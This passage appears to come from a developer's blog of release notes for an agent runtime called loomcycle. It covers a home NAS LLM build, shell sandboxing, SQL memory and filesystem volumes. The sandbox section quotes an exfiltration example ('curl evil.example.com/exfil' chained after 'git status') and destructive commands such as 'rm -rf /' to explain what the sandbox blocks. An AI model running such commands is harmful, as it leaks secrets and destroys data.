field) plus every transport (HTTP + gRPC + MCP + TS + Python adapters bump to 1.7.0). The pre-call vision gate scans the assembled messages for image content; if any message has an image and the resolved provider is text-only, the loop emits a clear error before Provider.Call. v1.7.1 fixes the gate's fallback-target gap surfaced by the loomboard team: the initial-call gate only checked the FIRST resolved provider, so a run failover from Claude to DeepSeek-text would let the image_url leak and DeepSeek would 400 with unknown variant 'image_url'. The patch re-runs SupportsVision against the fallback target inside tryProviderFallback, emits EventFallbackSuppressed with an RFC AT §4.4 cite when the target is non-vision, and propagates the original error; regression test pins the shape. v1.8.0 wires the effort hint to Ollama's think flag so local reasoning models (qwen3, deepseek-r1) emit their thinking trace via EventThinking; consistent error posture with cloud drivers (effort on a non-thinking Ollama model now errors instead of silent no-op). v1.8.1 makes the CLI subcommands (validate, agents, doctor) honor LOOMCYCLE_PRESETS/CONFIG_DIR/CONFIG_FILES layering via a shared loadLayeredConfig, plus a LOOMCYCLE_OLLAMA_DEBUG_THINK=1 diagnostic that logs each Ollama request's model/effort/think. v1.8.2 is the two-line root-cause fix: the loop's event switch had no case for EventThinking (and no default), so every provider's streamed reasoning trace was silently dropped at the loop and never reached SSE/gRPC/adapters, for every provider that supports thinking. The transcript stored the final response text (which often includes inline reasoning), so the bug was invisible until Ollama's think:true separated reasoning into a distinct field. Fix: case providers.EventThinking: emit(ev). Small wins. v1.6.1 makes the loomcycle mcp --upstream thin client transparently re-handshake on upstream session expiry (404 / -32001) instead of wedging until subprocess restart, ending the "please /reload-plugins" dance for Claude Code MCP users. And a new GET /v1/_models exposes the operator's alias map (non-secret; substrate:tenant gated; ScopeAdmin also satisfies), so a UI like loomboard's model picker can offer aliases (chat, local-medium) and store the alias on a fork instead of a concrete provider-model pair, letting the fork follow operator-level alias retargets. Adapters unchanged since v1.7.0; server-side patches through v1.8.2. TrueNAS deploy artifacts pinned to 1.8.2.
2026-06-28 · field report · ~17 min read

Local LLMs on my TrueNAS, and the frontend I had to build.

Field log from upgrading my lab NAS (Intel N100, 16 GB DDR5, fine as storage and weak for everything else) into one box that hosts three workloads that landed at the same time: product-test VMs (JobEmber.ai plus a sibling SaaS in stealth pre-release), the loomcycle multi-replica server I test against, and local LLM inference. The constraint framed every other decision. No spare $4,500-5,500 for an NVIDIA DGX Spark; a Mac Studio with serious unified memory sits in the same band; Strix Halo (Ryzen AI MAX) starts around EUR 4,000 / $5,000 in Europe and everything is soldered, so you commit to a fixed RAM amount and a fixed iGPU at purchase. That reframe ruled out the Spark on price, Strix Halo on price AND rigidity, and a discrete-GPU build because the iGPU-plus-fast-system-RAM path is meaningfully cheaper for the model sizes I actually run and a discrete card means a bigger case, bigger PSU, and a second thermal envelope on a 24/7 box. The answer was upgrade the existing NAS: AM5 socket (chip is socketed, swappable), DIMM DDR5 (capacity and timing upgradeable without rebuilding), an APU as the inference engine, total parts cost ~EUR 2,100 (Ryzen 7 8700G + 96 GB DDR5-6000 CL30 + motherboard + new PSU, roughly half the entry price of the rejected options), and a clean upgrade path for the next-generation Ryzen APU when it ships (one chip and a BIOS flash, no motherboard, no RAM, no PSU, no case). With that locked, the rest is forced choices. Final build: AMD Ryzen 7 8700G with 96 GB of DDR5, doubling as the existing TrueNAS NAS. The hardware decision that shaped everything else: an APU is not the same as a desktop CPU with "integrated graphics." The 2-CU iGPUs on regular Ryzen and Intel chips are useless for inference; the 8700G's Radeon 780M (12 CUs, ~12.6 TFLOPS, plus an NPU) is the entry point. There is no 12-core or 16-core APU with a strong iGPU in AM5; AMD caps the good-iGPU line at the 8-core 8700G, so you can have many cores OR a capable iGPU, not both. The exotic tier is Strix Halo (Ryzen AI MAX, 40-CU Radeon 8060S, soldered LPDDR5X), more expensive and less flexible. Memory bandwidth, not core count, is the real lever. LLM inference is memory-bandwidth-bound, so more cores barely help past a point. DDR5-6000 CL30 with an AMD EXPO profile is the AM5 sweet spot; the 8700G's Phoenix controller tops out around 6000-6400 MT/s with two DIMMs, so a DDR5-8000 kit downclocks and wastes money. Buying trap: kit suffix encodes the profile (Corsair Z = EXPO, C = XMP; G.Skill "Neo" / "Flare X5" = EXPO, "Trident Z5 RGB" = XMP). Migration from the old TrueNAS: don't clone the boot drive, fresh-install plus config restore; ZFS data pools are portable via zpool import; bigger-disk moves use ZFS replication (snapshot → send → receive); anything outside the GUI (cron jobs, hand-edited config) doesn't transfer; skip-version jumps can break app definitions even though pool data is safe. Getting the iGPU to do the work was the longest fight. gfx1103 is not officially supported by ROCm. Verify /dev/kfd + /dev/dri/renderD128 are visible (no GPU passthrough = no acceleration). Force the override with HSA_OVERRIDE_GFX_VERSION=11.0.2 + OLLAMA_IGPU_ENABLE=1. If you hit rocBLAS error: Cannot read TensileLibrary.dat for gfx1103, install prebuilt gfx1103 Tensile kernels (community builds pull these from Fedora's ROCm packages); after that Ollama reports library=ROCm compute=gfx1103 at 100% iGPU utilization. Real-workload throughput on this box: gemma4:latest at 13-15 tok/s; qwen3.6:latest at 9-12 tok/s; a smaller 3-4 GB model in the 24-48 tok/s band. The cross-model gap is the memory-bandwidth thesis playing out: qwen has more weight bytes per token to move than gemma does, and the gap is proportional to that, not to compute. The GTT-memory trick: BIOS may cap the iGPU's UMA frame buffer at 16 GB, but on Linux the iGPU dynamically allocates beyond that through GTT (Graphics Translation Table) memory up to about half system RAM by default, so on a 96 GB box the iGPU addresses tens of gigabytes regardless of the BIOS setting. Payoff: a 24 GB model running at 100% GPU on an integrated graphics core with a 128K context window. Tuning: OLLAMA_FLASH_ATTENTION=1 cuts KV-cache memory 30-50%; OLLAMA_KV_CACHE_TYPE=q8_0 roughly halves it again; num_gpu=99 as a model option pushes layers onto the iGPU and spills the rest to CPU; some models default to a tiny 4K context regardless of capability, set num_ctx explicitly. Wrong-fit tools: vLLM is for datacenter GPUs (CUDA, or supported-ROCm cards); doesn't support the 780M and isn't a real CPU engine. Ollama doesn't generate images; diffusion needs a separate stack. The thermal surprise: CPU running 85-90°C while only 20-30% loaded looks alarming. The iGPU shares the same physical package as the CPU cores; one temperature sensor. Inference at "100% GPU" heats the package, shows up as "CPU temperature." Cap PPT (Package Power Tracking) at 65 W in BIOS (PBO Limits → Manual; units are milliwatts); since inference is memory-bound, capping power costs almost no speed. In my run this dropped a 90°C load to under 60°C, killing any need for a cooler upgrade or water cooling. And the frontend problem. I tried Open WebUI for two days and uninstalled it. The chat surface itself is good (clean thread, conversation list, the in-thread renderer, the keyboard shortcuts; I'd happily ship something with similar UX). The blockers sit underneath the chat: the configuration UI is weird (settings live in places I had to hunt for, two days in I still wasn't sure which of several places held the "default model for new chats" setting); providers and models have two unlinked configuration surfaces and one of them does nothing (after editing what I thought was the canonical surface, the models weren't showing up in the chat picker, the OTHER surface was the one that mattered, the first one is as far as I can tell vestigial); and Open WebUI can't reach the loomcycle tools and primitives I'd built workflows around (Documents as structured workspaces, Channels for cross-agent handoffs, Interruption + mid-run steering on every interactive session, per-principal MCP dispatch so the agent and I share the same per-scope SQLite file). The chat is good; the substrate underneath it is the wrong one for me. So I'm building the chat I wanted on top of the substrate I already use, following the chat-first sequencing in RFC AC as it stands today. The chat surface ships first: a standalone React + Vite SPA in a new loomboard repo on the published @loomcycle/client, chat UX modelled on what Open WebUI gets right and the substrate hooks I missed. Each conversation is one loomcycle interactive session (RFC AI; first message starts it, follow-ups steer it, reopening re-attaches by run_id or replays the transcript). The full tool loop renders inline (structured tool calls, structured tool results, model reasoning between them; not a flat bubble, an actual record). Live token / throughput / context-window metrics; context-compaction button when the window fills. Interruption answers in place. Per-conversation model overrides (provider / model / tier / thinking-depth) materialized as a uniquely-named derived AgentDef so the shared one is unaffected. Reuses existing wire only (interactive sessions, Interruption, compactRun, getTranscript, agentDef, listLibraryAgents, whoami; no new transports). The board lands next, same app: kanban over Document + Path, chunks as cards, status as the column, typed fields driving chip rendering, state transitions through AgentTeam graphs (RFC AP); the launch publishing plan is the first dogfood loop. Chat is pre-alpha; the board has substrate plumbing but no UI yet. In parallel, the two loomcycle pieces I'm head-down on right now are tenant authorization (a real multi-tenant trust boundary across the wire surfaces) and loomcycle running as a TrueNAS-dockerized application so the same machine that hosts the inference hosts the runtime cleanly; both deserve their own writeup as the next blog topic.
2026-07-18 · release · ~12 min read

Agents and humans on the same chunks. How v1.5.0 made co-authoring the launch plan possible.

I'd been hand-editing a flat Markdown launch plan for three weeks. Every refactor cost 30 minutes of cut-and-paste. Two weekends ago I imported it as a chunked-graph Document (RFC AK, v1.4.0). 47 chunks; status as a typed field; SQL queries instead of grep. Then I hit a wall: the MCP plugin authenticated as mcp-operator while the Web UI logged me in as a different principal. SQL Memory uses per-scope file isolation, so my MCP-created Document landed in mcp-operator.db while the Web UI read from denn.db. Two distinct SQLite files. The doc was provably created (queryable from MCP) and provably invisible (no entry in the Web UI tree). Human-and-agent co-authoring couldn't cross that gap. v1.5.0 closes it. RFC AG (per-principal /v1/_mcp dispatch): the MCP-server HTTP transport used to run every request as a global operator regardless of bearer, which is why the route was substrate:admin-only. v1.5.0 keys the dispatch off the authenticated principal via mcpPrincipalCtx, which stamps UserID = subject + TenantID on every builtin-tool dispatch. User-scoped tools (document, memory, path) now key on the same id the off-run HTTP path uses. The route opens from substrate:admin to substrate:tenant; the per-tool gate inside the session still withholds admin-only meta-tools (token minting, runtime admin, snapshot capture/restore) by hiding them from tools/list and refusing them on tools/call. Hook meta-tools promote to tenant-confinable. applyPrincipal overrides wire-supplied tenant/user on spawn_run / spawn_runs so agent-spawned runs inherit the parent's identity. substrate:admin still satisfies the route. RFC AO (declared principals): a new top-level principals: block declares stable service identities — name → {tenant, subject, scopes, token_env}. The yaml carries only the token_env name; the bearer secret lives in .env.local via that env var. The bearer resolver tries minted OperatorTokenDef → declared principal → legacy LOOMCYCLE_AUTH_TOKEN (constant-time match; token_env may not name a loomcycle infra secret; a duplicate secret across two principals is a config-load error; an empty token_env at boot makes that principal inert with a startup warning). The payoff: one declared token authenticates BOTH the Web UI login at /ui/login AND an MCP thin client via LOOMCYCLE_MCP_UPSTREAM_TOKEN. Both resolve to the same (tenant, subject) by construction; the cross-transport file boundary disappears. RFC AN (config layering): --config is now repeatable; deep-merged left-to-right; LOOMCYCLE_CONFIG_FILES takes the same list as a colon-separated env var for containers. One recursive rule: mapping ⊕ mapping merges keys, scalar/sequence replaces. Every replaced leaf is logged at startup; LOOMCYCLE_CONFIG_STRICT=1 makes a cross-layer conflict fatal. Each file keeps its own ${ENV} expansion; the merged whole runs the existing validate(). A single --config is byte-identical to before. Bundles (e.g. a bundles/social-drafter/ agent + skill + system prompt) now stack onto operator config without copy-paste. What it unlocks: the launch plan as a workflow. 18 publication chunks of type publication with typed fields (platform, date, status, blog_slug, day_number, t_offset). Monday entries marked status: done; rest scheduled. Drafts written via update_chunk from MCP, status flipped to drafted, revision 1→2. Web UI saw the change live via the Channel topic documents/<id>/chunks. Optimistic concurrency catches same-chunk collisions; different chunks edit independently — no git merge on a single file. Status is queryable: SELECT * FROM chunks WHERE type='publication' AND status='scheduled' AND date <= '2026-06-30' returns an agent's next work item; the Web UI kanban view runs the same query. The natural agentic shape: human scaffolds → drafter agent picks up scheduled chunks → writes drafts → flips to drafted → human reviews → posts → flips to posted → reporter agent watches the channel and writes a weekly digest chunk. Three behaviors that the flat-Markdown plan couldn't support: optimistic concurrency on chunks, status as queryable data not prose, and per-chunk audit + Channel events. Additive — no breaking changes, no new wire RPCs. RFC AG is an auth/route change on an existing endpoint with the in-session per-tool gate preserving the admin-only boundary; RFC AO + AN are config-only. TS (@loomcycle/client) + Python (loomcycle) adapters are unchanged since v1.4.0 — no new adapter surface, so intentionally no @loomcycle/[email protected] and no python-v1.5.0. The Claude Code plugin bumps to v1.5.0; admin-only commands flagged. Existing deployments without a principals: block keep working unchanged via the legacy LOOMCYCLE_AUTH_TOKEN fallback.
2026-07-11 · release · ~12 min read

Path + Document: a Unix-like VFS and chunked-graph documents (v1.4.0).

Memory keys things by (scope, key); Volumes by name; Channels by topic. The agent dialect was opaque ids — fine while an agent's job was "do work, write state, finish," wrong once humans had to look. The launch publishing plan ran for three weeks across the v1.0→v1.3.0 arc as a single linear Markdown file that I rewrote by hand every time a publication moved buckets. Two related gaps sat on the roadmap: agents and humans had no shared, human-readable namespace for the things the runtime stored (three resources, three naming worlds, no ls); and "Document" was the obvious next primitive on top of Memory + SQL Memory — chunked-graph, first-class units with hierarchy + type + edges. v1.4.0 ships both: Path (RFC AL) and Document (RFC AK Phase 1). Path is the Linux inode/dirent split applied to substrate primitives. Resources keep permanent ids; a dirents row in the runtime store maps (tenant, scope, scope_id, parent_path, name) → resource. One tree spans Memory entries, Volume mounts, and Documents. Six ops on the new Path tool: resolve · ls · stat · mkdir (v1 no-op; directories implicit S3-style) · mv (atomic; cascades over a subtree in one transaction; refuses a move into its own subtree) · rm (dirent-only by default; resource_too:true cascades; recursive:true required for non-empty paths, Linux semantics). Paths reject .. at the boundary (the logical analog of sandbox.go's relInsideRoot); segments are [a-zA-Z0-9._-]+, max 64 segments / 1024 chars. A dirent is a name, not an authority grant — resolving /docs/launch to a Document id does not, by itself, let you read that Document; the resource's own scope/tenant check still applies. The risk Path introduces is integrity, not confidentiality. Resources opt in to a name: Memory.set { path: } registers a memory_entry dirent; VolumeDef.create { mount_at: } registers a volume_mount (default /vol/<name>; existing Volumes pick up implicit mounts lazily on first lookup, no migration); Document.create_document { path: } registers a document dirent. SQL Memory stays OUT of the tree (a per-scope database is not a named resource; SELECT doesn't compose with ls; likely never — the wrong abstraction). Document is a chunked-graph document with the content/structure split. Each chunk is a first-class unit with UUID + hierarchy position + optional supertag-like type (publication / review-finding / architect-output) + structured fields + status + Markdown body + revision integer. Edges are first-class too (chunk_edges with kind promotes / targets / implements; fast bidirectional lookup). Storage is split deliberately: chunk content (title, body, fields) lives in Memory keyed by the chunk UUID; chunk structure (parent / position / type / status / title / revision + edges + type schemas) lives in SQL Memory across four tables (documents, chunks, chunk_edges, chunk_types). Three reasons: different access patterns (content fetched whole and lazily; structure queried in bulk on every UI render); audit discipline (Memory captures content edits, SQL Memory captures structure edits); backup composition (Memory snapshot + SQL Memory snapshot together survive cross-instance restore, RFC X). 13 ops grouped: document lifecycle, chunk CRUD, edges, query, type defs. Three behaviors at the trust boundary: optimistic revision concurrency on update_chunk (stale revision returns conflict; agent re-reads, re-applies, retries — Web UI uses the same dance); atomic deletes (whole cascade in one SQL Memory transaction; bidirectional edge cleanup so no dangling incoming cross-document edges; delete_chunk refuses the root chunk); endpoint validation on edges + cycle guard on move_chunk. query_chunks in three layers: structured filters (document_id + type + status + parent_id), Path-joined (under_path:"/docs/launches/"), and a validator-gated raw sql: escape hatch routed through the SQL Memory statement validator (RFC AA Phase 1's allowlist: no ATTACH/VACUUM/PRAGMA/quoted-load_extension/multi-statement smuggling; writes refused from a read-only op). Document requires SQL Memory (LOOMCYCLE_SQLMEM_ENABLED=1); scope is agent or user in v1.4.0 (tenant deferred until SQL Memory has tenant scope). Both primitives are on every transport. Beyond in-band agent use, Path and Document are first-class operations off-run: POST /v1/_path + POST /v1/_document (HTTP), the Path / Document gRPC RPCs (riding the existing SubstrateRequest / SubstrateResponse shape), the LoomCycle MCP meta-tools path / document, and client.path() / client.document() in @loomcycle/[email protected] and [email protected] (Python). All four dispatch through one op-discriminated Connector method per tool (the RFC AI cross-transport pattern). Scope and tenant are resolved server-side from the authenticated principal, never the wire — an off-run call with scope:"user" keys on the principal's subject, so an external UI authenticated as user_id=alice reads and writes the same user-scoped namespace as agents running for the same user. No way for the wire to forge a scope_id. Both surfaces tenant-confined under ScopeTenant (substrate:admin also satisfies for cross-tenant administration). Bundle semantics for Documents in Path (borrowed from macOS .app): a Document at /docs/foo/v1.0 lists as a directory in Path AND resolves as one resource; the Web UI will render it expandable. Additive at the runtime layer — no breaking changes. New HTTP endpoints, gRPC RPCs, MCP meta-tools; nothing consumed those surfaces before. dirents is a new migration on both backends. Deployments that don't use Path see zero behavior change (resources only get a dirent when they opt in). Adapters bump: @loomcycle/[email protected] + python-v1.4.0 add client.path() + client.document(); older code keeps working against the parts it already speaks. The core (internal/tools/builtin/pathtool.go, document.go) plus the dirents table shipped on main ahead of this tag (PRs #538-#542); v1.4.0 is the first cut tag.
2026-07-04 · release · ~11 min read

Bashbox: in-process shell sandbox for agents. And what the bench told us about gbash speed (v1.3.0).

Every previous loomcycle release shipped with the same honest disclaimer on the Bash tool: restricted, not isolated. The four knobs (cwd, scrubbed env, output bounds, wall-clock timeout) are real, but they don't change what the host kernel lets the loomcycle process do. v1.1.0 (Filesystem Volumes, RFC AH) made the asymmetry visible: Read / Write / Edit / Glob / Grep all started honoring per-agent read-only volume bindings; Bash didn't, and rule #7 in the runtime CLAUDE.md said so explicitly: "Bash refuses read-only volumes rather than ship a guarantee a shell can't keep." A read-only mode on Bash would be a lie because a child sh process can cd anywhere it has filesystem permission and the host kernel sees the agent's UID, not loomcycle's enforcement. v1.3.0 ships Bashbox (RFC AJ): a new opt-in shell tool backed by gbash (Apache-2.0, pure-Go) that runs scripts in-process. No os/exec, no /bin/sh, no host process spawned at all. Path resolution stays inside the bound volume because there is no host kernel doing the resolving. The read-only mode is honestly enforceable because the write overlay is in RAM. Same input schema as Bash (script string + optional volume arg). Same wire events. Adapters unchanged (TS and Python stay at 1.1.1). Opt-in twice: LOOMCYCLE_BASHBOX_ENABLED=1 per deployment, allowed_tools: [Bashbox] per agent. Stateless per call (fresh interpreter every invocation; no shared env, no cd persistence). Bundle: gbash's coreutils registry plus pure-Go awk and jq via gbash contrib. Unknown commands refuse by default (no shell-out, no host PATH leak). The read-only overlay (the load-bearing piece): a ro volume mounts the host directory read-only as the base; writes during the call land in an in-memory write layer discarded when the call ends. A script can touch /work/scratch.tmp and the file appears within the same call but the host tree never sees it. The host-command fallback (RFC AJ §13, operator-only escape hatch): two new env knobs let named commands fall through to the real host shell. LOOMCYCLE_BASHBOX_FALLBACK_COMMANDS=git,gh allowlists specific binaries; only those names escape (so git status; curl evil.example.com/exfil runs git on the host and refuses curl in the sandbox, no smuggling). LOOMCYCLE_BASHBOX_FALLBACK_ALLOWED_ENV=GH_TOKEN,HOME,SSH_AUTH_SOCK injects credentials into the host child only (the sandbox env never sees them, so the model can't read them via env). Fallback requires a read-write volume (a host process can't honor the in-RAM overlay). Loud boot warning when either knob is set. Off by default. The honest performance disclosure: gbash is pure-Go reimplementations of coreutils against decades-optimized native C. exp10 benches it on a representative coding-agent corpus (real git clone, file counts, grep, line totals, large-file scan, dir-depth probe). Result: 31% slower than /bin/sh on total wall-clock, mixed per-op. Worst case count_funcs (grep -c across the tree) at +310%; one operation faster (total_loc, a wc -l aggregate, at -53%). git_clone only 15% slower because almost all the work is the real git binary via §13 fallback. One output mismatch: count_all_files returned 1274 vs 1193 because gbash find aborts on a relative symlink and 81 files past it never reach the count. Three findings filed upstream to gbash, all open: #834 find/EvalSymlinks aborts on relative symlinks (fix sits in resolveContainedSymlinkTarget: the containment check refuses the symlink before -type f filters skip it); #835 grep --include=GLOB missing (only 21 options defined, no per-file glob filter in enumerateRecursive, exits with code 2 on the unknown option); #836 xargs -P N silently falls back to serial (parsed and stored as maxProcs, but the parallel implementation in xargs.go:884 immediately delegates to the serial path with no warning; the inv.Exec callback shares session state that isn't goroutine-safe). Trust posture: Bashbox is the first Bash-shaped tool whose isolation claim matches the file tools. rm -rf / bounded to the in-RAM overlay; curl doesn't exist in the registry (no outbound network unless §13 fallback); cd ../../ refused by the workspace boundary; credential files outside the volume don't exist in the gbash workspace. Two honest disclosures: gbash is alpha-tagged and the upstream threat model says explicitly "not a hardened sandbox" (loomcycle's outer trust boundary carries the security-critical guarantees; gbash carries the in-process shell semantics); command coverage measured ~97% identical-or-equivalent on a real loomcycle script corpus (the 3% gap drove the §13 fallback design). Why opt-in, why not auto-replace Bash: trusted-dev deployments stay on the existing tool (host shell, full PATH, peak throughput). Multi-tenant + untrusted-input + JobEmber.ai-shaped production deployments switch agents to Bashbox. Both tools coexist; operators pick per agent. The 31% speed penalty matters for tight inner loops, matters less for single-shot scripts most agents actually run. What's next: upstream optimization (gbash dispatch, workspace stat path, find traversal, grep regex cache haven't been profiled), upstream PRs on the contrib bundle when specific commands become load-bearing, gbash exits alpha. The opt-in posture is durable either way. Additive + off-by-default — no breaking changes, no new wire RPCs. A deployment that doesn't set LOOMCYCLE_BASHBOX_ENABLED=1 sees zero behavior change.
2026-06-30 · release · ~11 min read

SQL Memory for agents. The third facet of the Memory primitive (v1.2.0).

Memory shipped at v0.8.0 as key-value with TTL and atomic increments. v0.9.0 added the vector facet (sqlite-vec, pgvector, provider-agnostic embedders). For a couple of weeks that was the shape: K/V for state, vectors for semantic search. It wasn't enough — the use case that kept surfacing in JobEmber.ai's production agents and every other real loomcycle deployment was the one neither facet covered: related tables with joins and aggregates. The workaround was Bash + sqlite3 — restricted-not-isolated. v1.2.0 ships RFC AA Phases 1 through 3g: SQL Memory. A third facet of the Memory primitive, two new ops on the same tool (sql_exec, sql_query) plus three for transactions (sql_begin, sql_commit, sql_rollback). Authorized agents run arbitrary SQL against a per-scope database the runtime hosts, isolated from the main loomcycle store. Two tiers: sqlite (file-per-scope under operator-blessed dir, statement-allowlist hardened — the default modernc.org/sqlite driver has no authorizer interface, so the primary defense is a Go-layer parsed-statement validator that refuses ATTACH/DETACH/VACUUM/PRAGMA/quoted-load_extension/multi-statement smuggling, backed by per-scope file isolation) and postgres (schema-per-scope in a separate aux DB, per-scope least-privilege LOGIN role with search_path pinned to its own schema). Three scopes matching the rest of Memory: durable agent / user (persist across runs, tenant-keyed) plus ephemeral run (one DB per spawn tree, dropped at run completion with fenced removal — mirrors RFC AH ephemeral volumes). Default-deny sql_scopes ACL per agent (RFC W pattern); having Memory in allowed_tools isn't enough. Per-statement timeout, per-scope byte quota, row cap with truncated flag, full audit (statement text passes through the RFC Z redactor). Phase 3a explicit transactions: sql_begin/sql_commit/sql_rollback open runtime-managed transactions; the validator still refuses agent-issued BEGIN. Cleanup is the load-bearing detail — explicit commit/rollback, run-end auto-rollback before the run-scope drop, TTL reaper (default 30s) for abandoned transactions. Phase 3b nested transactions via SAVEPOINT — a second sql_begin nests instead of erroring; depth reported in every op result; LIFO, capped at 16. Phase 3c vector columns inside agents' own tables (postgres tier): semantic KNN and structured filters in one query — the thing K/V + main vector Memory can't do. Bind arg {"$embed": "<text>"} is replaced server-side by the embedding (multi-KB vectors never round-trip through the LLM); the operator installs pgvector once into a shared read-only sqlmem_ext schema; the agent declares its own vector(N) column + HNSW index. Phase 3d + 3f.3 durable-scope GC: TTL sweeper (idle-targeting) + size-budget sweeper (bulk-targeting), both off-by-default + lossy-by-contract; in-use scopes never evicted; run scopes never counted. Phase 3e + 3f.2 snapshot integration: runtime JSON snapshot captures SQL Memory; every durable scope dumped logically (schema DDL + table data) into an optional tier-tagged sqlmem envelope; restore replays through the normal provisioned path; idempotent; per-scope cap (sqlmem_snapshot_max_scope_bytes) so one runaway scope can't fail the whole capture. Phase 3g read-only shared schemas (postgres tier): operator-blessed reference data (lookup tables, taxonomies, config) loaded into a dedicated schema, GRANT SELECT ... TO PUBLIC, listed in sqlmem_shared_schemas; runtime bakes it onto every scope role's search_path; agents SELECT/JOIN it, can't write it (engine-enforced, role holds only SELECT). The killer demo: exp9 — a Python sieve (primes.py) streams primes to stdout. A coding agent reads them via Bash stdio, creates a SQL memory table in user scope, batch-inserts every prime, then pings a channel. A validator agent on a different run waits on the channel, reads the primes from the same user-scoped SQL table, validates each one via inline trial-division through Bash, writes verdicts to a second table. Shared key user_id=exp9 on both runs routes them to the same scope. Why a Memory facet, not a new tool: same scope vocabulary (K/V key + SQL table belong to the same logical container), same trust posture (per-scope isolation, default-deny ACL, audit, redactor). One tool, ten ops, one mental model. Additive + off-by-default — no breaking changes, no new wire RPCs. TS adapter + Python adapter unchanged at 1.1.1; SQL Memory rides on the existing Memory MCP surface. @loomcycle/[email protected] already works against v1.2.0. The structured-storage gap closes without spawning Bash + sqlite3 subprocesses.
2026-06-27 · release · ~10 min read

Interactive agentic sessions, now on every adapter (v1.1.1).

Yesterday's v1.1.0 shipped Filesystem Volumes - the workspace half of what the launch-week Paca conversation surfaced as missing for an external product to drive a loomcycle agent. Today's v1.1.1 ships RFC AI - the conversation half. A 3rd-party app can now start an interactive run, push operator messages into it mid-flight (steering), survive client disconnect under context.WithoutCancel, and re-attach by run_id from a fresh process or device. All through the official client surfaces that already handle non-interactive runs. The interactive terminal shipped over v0.26-v0.30 and has been load-bearing in the Web UI for five months: park at end_turn via EventAwaitingInput, drain a steer queue at the top of each iteration (never mid-tool-call so a tool_use/tool_result pair is never split), cross-replica steer routing via the SteerCoordinator backplane, replay-from-?from_seq + live-tail on GET /v1/runs/{id}/stream. That whole machine was reachable only through six raw HTTP calls in web/src/api.ts. The official adapters (@loomcycle/client, Python gRPC) exposed a one-shot model with no interactive flag, no steering, no re-attach. gRPC had a deeper structural gap: the steer.Registry and re-attach tail were owned by the HTTP Server struct, not the transport-shared Connector gRPC dispatches through. v1.1.1 closes both gaps with three shared server changes + a thin per-transport surface. S1: self-sufficient re-attach - streamRunEvents refactored to a visitor; the tail now replays the operator's own user_input rows as steer frames with source="replay" (was: skipped), so a cold client on a different device reconstructs the whole conversation, not just the agent's responses. The Web UI de-dupes against its optimistic echo. S2: Connector-lift - SteerRun + StreamRunEvents (+ RunEventVisitor) added to the Connector (additive, mirrors the v0.33.0 CompactRun lift). gRPC now reaches the same in-process steer registry an HTTP-started run registered in; cross-replica routing inherited free. handleRunInput dispatches through SteerRun too, so both transports share one path. S3 + gRPC wire - RunInput and StreamRun RPCs, interactive field on RunRequest, AwaitingInput and UserInput Event payloads, eventToProto maps the variants. source is server-stamped (never wire-trusted); tenant opaque-404 preserved; scope gates RunInput→runs:create, StreamRun→runs:read. TypeScript adapter goes 57→61 methods + a high-level InteractiveSession driver that ports the Web UI's useRunStream orchestration (start, events, send, cancel, detach, streamRunByID). Python adapter goes 40→42 RPCs (run_input + stream_run + interactive=True). Both adapters realign to 1.1.1 (the loomcycle line) so they actually publish together - tagging v1.1.1 publishes @loomcycle/[email protected] (carrying the previously-skipped v0.35.0 Volume surface too) + a separate python-v1.1.1 tag publishes [email protected]. Reuse over reinvention: the parking, steering, cross-replica routing, and re-attach engines didn't change; only where they're reachable from did. Same shape RFC AH used for resolveInsideRoot, RFC L used for the host policy, RFC Z used for the contextplugin chain. The Paca-shaped integration story, two releases in: v1.1.0 = workspace isolation (per-ensemble Filesystem Volumes); v1.1.1 = conversation parity (interactive sessions on every adapter). Combined, an external product can now create an ephemeral workspace, clone a repo into it, start a loomcycle agent in interactive mode, drive the conversation through the official adapter, let the user disconnect or switch devices, re-attach by run_id later, and the ephemeral volume auto-purges when the run completes. Zero loomcycle-specific reverse engineering. The Paca integration itself remains on hold while the maintainer absorbs the multi-agent ensemble shape; the runtime side is no longer the blocker.
2026-06-26 · release · ~12 min read

Filesystem Volumes arrived. Multi-ensemble isolation in one runtime.

A week and a half ago the launch-week Paca conversation surfaced a real gap: every agent in a loomcycle instance shared one global filesystem jail (LOOMCYCLE_READ_ROOT / WRITE_ROOT / BASH_CWD), so two ensembles in one runtime could read and write into each other's working tree with no operator control. The only fix was per-ensemble containers, which throws away the "one long-lived runtime hosting many agents cheaply" property the runtime exists to provide. Today's v1.1.0 closes that gap. RFC AH (Filesystem Volumes), Phases 1 through 5, shipped. A Volume is {name, path, mode: ro|rw}; an AgentDef binds to a named subset, file tools take an optional volume arg, ro/rw is enforced (Bash refuses ro rather than ship a guarantee a shell can't keep), and the load-bearing invariant is spawn confinement: a sub-agent's volume set ⊆ its parent's, with ro/rw resolving to the more restrictive. The same shape as the existing allowed_hosts caller-authoritative narrowing for network egress. The TOCTOU-safe resolveInsideRoot didn't change a byte; only which root is passed in changed. Phase 2a adds the dynamic VolumeDef substrate — tenant-scoped, runtime-mutable, with a runtime-derived path that never accepts a caller-supplied directory (the substrate derives <dynamic_root>/<tenant>/<name>; names match ^[a-z0-9][a-z0-9_-]{0,63}$, no slashes/dots, no path injection). The op set is create / delete / purge, not retire / promote / fork (a Volume is a pointer to mutable on-disk content, not an immutable def). Phase 2b adds ephemeral run-scoped volumes: VolumeDef op=create ephemeral=true provisions <dynamic_root>/_ephemeral/<run_id>/<name> and auto-purges when the top-level run completes (terminally, in any state). Run-tree isolation: the ephemeral set is created fresh per top-level run, inherited by sub-agents (so a dispatcher and its 8 reviewers share one volume), but never crosses between top-level runs. Behind four fences for the purge (re-derive path, EvalSymlinks, assert-inside-root, prefix-check _ephemeral/<run>, refuse to delete the root); a singleton sweeper backstops crashed runs; paused runs skipped so a snapshot-and-resume keeps its working tree. Phase 3 BREAKING: the legacy jail env vars are removed. Volumes are now the sole filesystem mechanism. An agent not bound to any volume has no filesystem access (sandbox-by-default, mirroring "no allowed_hosts means no egress"). A deploy still setting the retired env vars fails at config-load with a migration hint. Migration is one-line: replace the three env vars with volumes: { default: { path: /work/sandbox, mode: rw, default: true } }. Phase 4 ships a Volumes tab in the Web UI; Phase 5 closes cross-transport parity (HTTP, gRPC, MCP, TypeScript adapter, Python adapter all carry the same VolumeDef surface, identical wire shape and error codes). The killer demo: exp8 ships as a self-contained directory: a dispatcher agent creates an ephemeral volume, git clones loomcycle into it, fans out 8 reviewer agents via Agent op=parallel_spawn (in-process barrier, no MCP round-trip), each writes findings to Memory review:<slice>:findings, a consolidator reads the ledger and writes review-report.md to the default volume, and the ephemeral volume auto-purges when the dispatcher exits. Contrasts with exp7 (external MCP fan-out, pre-cloned static ro volume, operator-driven barrier): use exp7 when the repo is large/shared or operators bring other MCP tools; use exp8 when you want zero-setup zero-cleanup on-demand code review with loomcycle owning the full lifecycle. Six PRs 